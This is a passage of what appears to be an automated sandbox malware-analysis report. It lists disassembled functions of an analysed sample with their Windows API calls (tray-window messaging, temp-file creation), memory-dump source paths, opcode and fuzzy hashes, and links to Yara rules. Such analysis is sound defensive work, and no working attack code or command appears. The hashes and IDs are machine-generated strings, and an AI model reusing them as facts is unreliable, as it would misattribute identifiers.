                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: DirectoryFreeLibrarySystem
                                                                                                                                                                                      • String ID: WIN_XPe
                                                                                                                                                                                      • API String ID: 510247158-3257408948
                                                                                                                                                                                      • Opcode ID: f294bc08f03b93c1b6b8635da87f31b8029d941dfcfdf208f7e6eab6eadfffea
                                                                                                                                                                                      • Instruction ID: cb1fce255192f78049d9175e9c6fddce5a9f82109e3fda7025fadfd42f7244ca
                                                                                                                                                                                      • Opcode Fuzzy Hash: f294bc08f03b93c1b6b8635da87f31b8029d941dfcfdf208f7e6eab6eadfffea
                                                                                                                                                                                      • Instruction Fuzzy Hash: FFE0A571C1810DABCB19EBA9C859AEDB7B8BB58300F14C896E426A2150D7759A449F21
                                                                                                                                                                                      Function 00968495 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0096849F
                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 009684B2
                                                                                                                                                                                        • Part of subcall function 00948355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 009483CD
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                                                                                      • Opcode ID: e8848597a1ec1177d665e7498b93df425197b625c2334f72e43a526b3c8b716a
                                                                                                                                                                                      • Instruction ID: 5539e5953cc1c685e50af4c261ce465c87f410fda0704c46d9b830733b4f421f
                                                                                                                                                                                      • Opcode Fuzzy Hash: e8848597a1ec1177d665e7498b93df425197b625c2334f72e43a526b3c8b716a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 61D01272399318B7E764A7709D4FFD76B54AF54B11F050929B34AAA2D0C9E0B800C760
                                                                                                                                                                                      Function 009684C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009684DF
                                                                                                                                                                                      • PostMessageW.USER32(00000000), ref: 009684E6
                                                                                                                                                                                        • Part of subcall function 00948355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 009483CD
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                                                                                      • Opcode ID: af7ac93c1675936adc1b6db498bc2fa793d9a84bfc51f2875a24193b0cde4068
                                                                                                                                                                                      • Instruction ID: b1dce239c5c132fe1036a5f030592ce462e245a12f9c8638a266ecf0b1bad418
                                                                                                                                                                                      • Opcode Fuzzy Hash: af7ac93c1675936adc1b6db498bc2fa793d9a84bfc51f2875a24193b0cde4068
                                                                                                                                                                                      • Instruction Fuzzy Hash: 27D012723DA318BBE765A7709D4FFC76754AB59B11F050929B34AAA2D0C9E0B800C764
                                                                                                                                                                                      Function 0094D009 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 0094D01E
                                                                                                                                                                                      • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0094D035
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Temp$FileNamePath
                                                                                                                                                                                      • String ID: aut
                                                                                                                                                                                      • API String ID: 3285503233-3010740371
                                                                                                                                                                                      • Opcode ID: 0d625de8e5098d1944b0a13f10f4c39833ed5fd2c8e5918b6e2725913ebffae0
                                                                                                                                                                                      • Instruction ID: 704a543d1772d4f6e0e0ee08f6ceb8356b4aa286df31ee24fe434e4410fc22e4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d625de8e5098d1944b0a13f10f4c39833ed5fd2c8e5918b6e2725913ebffae0
                                                                                                                                                                                      • Instruction Fuzzy Hash: 50D05EB154530EBBDB10ABA0ED0EF99776CAB00718F1041907624D10E1D3B0E6458BA0